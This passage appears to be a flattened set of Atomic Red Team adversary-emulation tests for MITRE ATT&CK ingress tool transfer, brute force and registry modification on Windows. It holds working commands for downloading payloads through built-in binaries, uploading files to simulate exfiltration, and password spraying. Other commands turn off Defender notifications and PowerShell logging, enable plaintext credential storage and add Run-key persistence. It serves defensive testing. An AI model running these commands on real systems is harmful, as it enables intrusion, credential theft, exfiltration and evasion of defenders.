echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
T1105 command_prompt elevated windows svchost writing a file to a UNC path
Ingress Tool Transfer
svchost.exe writing a non-Microsoft Office file to a UNC path. Upon successful execution, this will copy cmd.exe to c:\ as svchost.exe, then execute svchost.exe with output to a txt file on a UNC path.
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
T1105 command_prompt windows Download a File with Windows Defender MpCmdRun.exe
Ingress Tool Transfer
Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
T1105 command_prompt windows File download with finger.exe on Windows
Ingress Tool Transfer
Simulate a file download using finger.exe. Connects to localhost by default; use the custom input argument to test finger connecting to an external server. Because this is being tested against localhost, you should not expect a successful connection. https://www.exploit-db.com/exploits/48815 https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
finger base64_filedata@#{remote_host}
T1105 command_prompt windows Curl Download File
Ingress Tool Transfer
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not.
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
T1105 command_prompt windows Curl Upload File
Ingress Tool Transfer
The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration. Expected output will include whether the file uploaded successfully or not.
#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}
T1105 command_prompt windows Download a file with Microsoft Connection Manager Auto-Download
Ingress Tool Transfer
Uses cmdl32 to download an arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection; however, the config is modified to download the arbitrary file. The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN server profile is avoided by setting a temporary TMP folder and denying the delete permission on all files for the user. Upon successful execution the test will open the Calculator and Notepad executables for 10 seconds. Reference: https://twitter.com/ElliotKillick/status/1455897435063074824 https://github.com/LOLBAS-Project/LOLBAS/pull/151 https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
"#{Path_to_file}" 1>NUL 
T1105 command_prompt windows Printer Migration Command-Line Tool UNC share folder into a zip file
Ingress Tool Transfer
Create a ZIP file from a folder on a remote drive.
del %TEMP%\PrintBrm.zip >nul 2>&1 
#{Path_PrintBrm} -b -d #{Path_unc}  -f %TEMP%\PrintBrm.zip -O FORCE
T1105 command_prompt windows Lolbas replace.exe use to copy file
Ingress Tool Transfer
Copy file.cab to the destination. Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A
T1105 command_prompt windows Lolbas replace.exe use to copy UNC file
Ingress Tool Transfer
Copy a UNC file to the destination. Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A
T1105 command_prompt windows certreq download
Ingress Tool Transfer
Use certreq to download a file from the web.
certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
T1105 command_prompt windows Download a file using wscript
Ingress Tool Transfer
Use wscript to run a local Visual Basic script file to download a remote file.
wscript.exe "#{vbscript_file}"
T1105 command_prompt windows Nimgrab - Transfer Files
Ingress Tool Transfer
Use nimgrab.exe to download a file from the web.
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
T1105 command_prompt elevated windows iwr or Invoke Web-Request download
Ingress Tool Transfer
Use the 'iwr' alias or "Invoke-WebRequest" with the -URI argument to download a file from the web. Note: it also works without -URI in some versions.
powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
T1105 command_prompt elevated windows Arbitrary file download using the Notepad++ GUP.exe binary
Ingress Tool Transfer
GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files (.zip) from the internet/GitHub. [Reference](https://x.com/nas_bench/status/1535322182863179776?s=20) Upon execution, a sample zip file will be downloaded to the C:\Temp\Sample folder.
mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
T1105 command_prompt windows Remote File Copy using PSCP
Ingress Tool Transfer
Copy a staged file using PSCP.exe to a public target location.
fsutil file createnew C:\Temp\T1105_scp.zip 1048576
echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
T1106 command_prompt windows Execution through API - CreateProcess
Native API
Execute a program by leveraging Win32 APIs. By default, this will launch calc.exe from the command prompt.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe "#{source_file}"
%tmp%/T1106.exe
T1110.001 command_prompt windows Brute Force Credentials of single Active Directory domain users via SMB
Password Guessing
Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller.
echo Password1> passwords.txt
echo 1q2w3e4r>> passwords.txt
echo Password!>> passwords.txt
echo Spring2022>> passwords.txt
echo ChangeMe!>> passwords.txt
@FOR /F "delims=" %p in (passwords.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\#{user}" "%p" 1>NUL 2>&1 && @echo [*] #{user}:%p && @net use /delete %logonserver%\IPC$ > NUL
T1110.002 command_prompt elevated windows Password Cracking with Hashcat
Password Cracking
Execute Hashcat.exe with a provided SAM file dumped from the Windows registry and a password list to crack against.
cd #{hashcat_exe}\..
#{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}
T1110.003 command_prompt windows Password Spray all Domain Users
Password Spraying
CAUTION! Be very careful not to exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_commands to create a list of all domain users in the temp directory called users.txt. See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
T1112 command_prompt windows Modify Registry of Current User Profile - cmd
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
T1112 command_prompt elevated windows Modify Registry of Local Machine - cmd
Modify Registry
Modify the Local Machine registry Run key to change the Windows Defender executable that is run on startup. This should only be possible when CMD is run with administrative rights. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
T1112 command_prompt elevated windows Modify registry to store logon credentials
Modify Registry
Sets a registry key that tells Windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows BlackByte Ransomware Registry Changes - CMD
Modify Registry
This task recreates the steps taken by BlackByte ransomware before it worms to other machines. See the "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/ The steps are as follows: 1. Elevate local privilege by disabling UAC remote restrictions; 2. Enable the OS to share network connections between different privilege levels; 3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths. The registry keys and their respective values will be created upon successful execution.
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Registry Tool
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the Windows Registry tool, preventing the user from modifying registry entries. See an example of how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Task Manager application
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the Windows Task Manager application. See an example of how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Notification Center
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the Windows Notification Center. See how Remcos RAT abuses this technique: https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Shutdown Button
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the Windows shutdown button. See how ransomware abuses this technique: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Disable Windows LogOff Button
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the Windows logoff button. See how ransomware abuses this technique: https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Change Password Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the Windows change password feature. See how ransomware abuses this technique: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Lock Workstation Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the Windows Lock Workstation feature. See how ransomware abuses this technique: https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoDesktop Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Hide all icons on Desktop" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how a Trojan abuses this technique: https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoRun Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Remove Run menu from Start Menu" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how a Trojan abuses this technique: https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoFind Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Remove Search menu from Start Menu" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how a Trojan abuses this technique: https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoControlPanel Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Disable Control Panel" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how a Trojan abuses this technique: https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoFileMenu Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Remove File menu from Windows Explorer" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how a Trojan abuses this technique: https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoClose Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Disable and remove the Shut Down command" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how a Trojan abuses this technique: https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoSetTaskbar Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Disable changes to Taskbar and Start Menu Settings" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoTrayContextMenu Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Disable context menu for taskbar" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoPropertiesMyDocuments Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Hide Properties from My Documents icon" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Hide Windows Clock Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Hide Clock" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCAHealth Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Remove the Security and Maintenance icon" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCANetwork Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Remove the networking icon" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCAPower Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to enable the "Remove the battery icon" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCAVolume Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
T1112 command_prompt windows Windows Modify Show Compress Color And Info Tip Registry
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to turn off two Explorer settings: "Show pop-up description for folder and desktop items" (ShowInfoTip) and "Show encrypted or compressed NTFS files in color" (ShowCompColor), both set to 0. See how HermeticWiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Windows Powershell Logging Disabled
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable PowerShell Module Logging, Script Block Logging and Transcription, and to set and then remove the EnableScripts script-execution policy value. See https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
T1112 command_prompt elevated windows Windows Add Registry Value to Load Service in Safe Mode without Network
Modify Registry
Modify the registry to allow a driver or service to persist in Safe Mode. See https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details. Adding a subkey under Minimal named after your service, with its default value set to "Service", causes that service to start when the machine boots into Safe Mode without networking. The same applies to the Network subkey.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
T1112 command_prompt elevated windows Windows Add Registry Value to Load Service in Safe Mode with Network
Modify Registry
Modify the registry to allow a driver or service to persist in Safe Mode with networking. See https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details. Adding a subkey under Network named after your service, with its default value set to "Service", causes that service to start when the machine boots into Safe Mode with networking.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
T1112 command_prompt elevated windows Disable Windows Toast Notifications
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Disable Windows Security Center Notifications
Modify Registry
Modify the machine registry (HKLM, 32-bit view under WOW6432Node) using reg.exe via cmd console to disable the Windows Security Center (Action Center) notification experience. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Suppress Win Defender Notifications
Modify Registry
Modify the machine registry (Windows Defender UX Configuration policy key) using reg.exe via cmd console to suppress Windows Defender notifications. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Allow RDP Remote Assistance Feature
Modify Registry
Modify the machine registry (Terminal Server key) using reg.exe via cmd console to allow the Remote Assistance feature (fAllowToGetHelp = 1). This feature allows a specified user to connect to the targeted machine over RDP to provide assistance. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
T1112 command_prompt windows NetWire RAT Registry Key Creation
Modify Registry
NetWire creates its home key (HKCU\SOFTWARE\NetWire) and adds itself to the auto-run group in the victim's registry. See the NetWire malware sandbox report - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
T1112 command_prompt windows Ursnif Malware Registry Key Creation
Modify Registry
Ursnif downloads additional modules from the C&C server and stores them as binary values under the registry key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\<GUID>. More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
T1112 command_prompt elevated windows Terminal Server Client Connection History Cleared
Modify Registry
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username used to log in after each successful connection to the remote computer. This test clears that history by deleting the values under the Default key and removing the Servers key entirely.
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
T1112 command_prompt elevated windows Disable Windows Error Reporting Settings
Modify Registry
Modify the machine registry using reg.exe via cmd console to disable Windows Defender enhanced notifications, by setting DisableEnhancedNotifications under the Windows Defender Reporting policy key in both the 64-bit and 32-bit registry views. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f /reg:64
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f /reg:32
T1112 command_prompt elevated windows DisallowRun Execution Of Certain Applications
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to prevent the user from running specific programs that could help them manually remove malware or detect it with a security product. DisallowRun = 1 turns the policy on; each numbered value under the DisallowRun subkey names one blocked executable.
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
T1112 command_prompt elevated windows Enabling Restricted Admin Mode via Command_Prompt
Modify Registry
Enabling Restricted Admin mode via the command prompt (DisableRestrictedAdmin = 0) allows an attacker who holds an NTLM hash to perform a pass-the-hash attack over RDP. See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
T1112 command_prompt elevated windows Mimic Ransomware - Enable Multiple User Sessions
Modify Registry
This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. See [Mimic Ransomware Overview](https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
T1112 command_prompt elevated windows Mimic Ransomware - Allow Multiple RDP Sessions per User
Modify Registry
This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. See [Mimic Ransomware Overview](https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Event Viewer Registry Modification - Redirection URL
Modify Registry
Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will open the URL or execute the program defined in the redirection URL registry entry.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "#{redirection_url}" /f
T1112 command_prompt elevated windows Event Viewer Registry Modification - Redirection Program
Modify Registry
Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /d "#{redirection_program}" /f
